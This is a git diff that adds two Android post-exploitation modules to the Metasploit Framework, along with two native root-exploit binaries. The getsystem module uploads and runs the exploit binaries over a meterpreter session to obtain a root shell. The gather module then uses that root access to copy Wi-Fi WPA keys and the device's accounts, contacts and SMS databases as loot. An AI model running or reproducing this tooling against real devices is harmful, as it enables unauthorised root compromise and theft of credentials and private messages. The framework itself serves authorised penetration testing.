diff --git a/data/android/exynosabuse b/data/android/exynosabuse new file mode 100755 index 0000000000000..b6ed085331a7a Binary files /dev/null and b/data/android/exynosabuse differ diff --git a/data/android/run_root_shell b/data/android/run_root_shell new file mode 100755 index 0000000000000..e3ffb3f322ec2 Binary files /dev/null and b/data/android/run_root_shell differ diff --git a/modules/post/android/escalate/getsystem.rb b/modules/post/android/escalate/getsystem.rb new file mode 100644 index 0000000000000..b6d82d7f05a63 --- /dev/null +++ b/modules/post/android/escalate/getsystem.rb @@ -0,0 +1,87 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Android Escalate via Native Binary', + 'Description' => %q{ This module uses native binaries to attempt to get a root shell }, + 'License' => MSF_LICENSE, + 'Author' => 'timwr', + 'Platform' => [ 'android' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + + register_options([ + OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-3), otherwise try them all", 0]) + ], self.class) + + @techniques = [ 'su', 'run_root_shell', 'exynosabuse' ] + end + + def use_technique(tech) + filename = @techniques[tech] + + print_status("Using technique " + filename) + + if tech == 0 + # su is a special case for rooted devices + # this may invoke a user prompt from the superuser app + cmd = "su\n" + else + # upload the binary + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', filename) + binary = session.fs.file.new(filename, "wb") + binary.write(File.read(localfile, {:mode => 'rb'})) + binary.close() + + # execute the binary + cmd = "cd /data/data/com.metasploit.stage/files" + cmd << " && chmod 777 " + filename + cmd << " && ./" + filename + "\n" + end + + # finally, check if we have root + cmd << "id\n" + + # run the commands in a channel + process = session.sys.process.execute("sh", "", {'Channelized' => true}) + process.channel.write(cmd) + output = process.channel.read + if output =~ /root/ + print_good("got root: " + output) + return true + else + print_error(output) + + # cleanup + process.channel.close + process.close + if tech != 0 + session.fs.file.delete(filename) + end + return false + end + end + + def run + tech = datastore['TECHNIQUE'].to_i + if tech == 0 + use_technique(2) + use_technique(1) + use_technique(0) + else + use_technique(tech - 1) + end + end + +end diff --git a/modules/post/android/gather/gather.rb b/modules/post/android/gather/gather.rb new file mode 100644 index 0000000000000..a764f5b373c5f --- /dev/null +++ b/modules/post/android/gather/gather.rb @@ -0,0 +1,77 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/post/common' +require 'msf/core/post/file' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + include Msf::Post::File + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Android Gather', + 'Description' => %q{ Post Module to gather from an android device }, + 'License' => MSF_LICENSE, + 'Author' => ['timwr'], + 'Platform' => [ 'android' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + end + + def run + channel = find_root_channel + if channel.nil? + print_error("no root channel") + else + store_wifi_psk(channel, "/data/misc/wifi/wpa_supplicant.conf") + db_files = ['/data/system/users/0/accounts.db', + '/data/data/com.android.providers.contacts/databases/contacts2.db', + '/data/data/com.android.providers.telephony/databases/mmssms.db', ] + db_files.each do |db_file| + store_db(channel, db_file) + end + end + end + + def store_db(channel, file) + filename = ::File.basename(file) + tmp = "/data/local/tmp/db" + cmd = "[ -f #{file} ] && " + cmd << "cp #{file} #{tmp} && " + cmd << "chmod 777 #{tmp} && " + cmd << "echo 1 || " + cmd << "echo 2\n" + channel.write(cmd) + return if channel.read =~ 1 + + loot = read_file(tmp) + lootfile = store_loot(filename, "binary/db", session, loot, file, "Sqlite db file") + print_good("#{filename} saved at: #{lootfile.to_s}") + end + + def store_wifi_psk(channel, file) + channel.write("cat #{file}\n") + loot = channel.read + loot_file = store_loot("wpa.psk", "text/plain", session, loot, file, "WPA PSK file") + print_good("wpa-psk file saved at: #{loot_file.to_s}") + end + + def find_root_channel + session.channels.each_value do |ch| + ch.write("id\n") + output = ch.read + if output =~ /root/ + return ch + end + end + return nil + end +end +